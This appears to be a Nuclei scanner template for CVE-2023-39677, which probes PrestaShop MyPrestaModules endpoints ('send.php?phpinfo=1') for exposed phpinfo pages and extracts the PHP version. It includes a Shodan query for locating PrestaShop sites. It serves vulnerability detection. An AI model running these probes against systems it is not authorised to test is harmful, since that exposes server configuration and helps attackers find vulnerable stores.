id: CVE-2023-39677 info: name: PrestaShop MyPrestaModules - PhpInfo Disclosure author: meme-lord severity: high description: | PrestaShop modules by MyPrestaModules expose PHPInfo reference: - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/ - https://cve.report/CVE-2023-39677 - https://myprestamodules.com/ - https://sorcery.ie classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39677 epss-score: 0.00632 epss-percentile: 0.76667 cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: verified: true max-request: 2 vendor: simpleimportproduct_project product: simpleimportproduct framework: prestashop shodan-query: http.component:"PrestaShop" tags: cve,cve2023,prestashop,phpinfo,disclosure http: - method: GET path: - "{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1" - "{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1" matchers-condition: and matchers: - type: word part: body words: - "PHP Extension" - "PHP Version" condition: and - type: status status: - 200 extractors: - type: regex part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' # digest: 4a0a00473045022014b1e6887f7fc81da8cb7acd757e32dfffac2929cdeac2418639e220ab29f4db022100b11c704b6cb8c64a3d4f98403856311f275a0d0092bf6d739a32397ed133126e:922c64590222798bb761d5b6d8e72950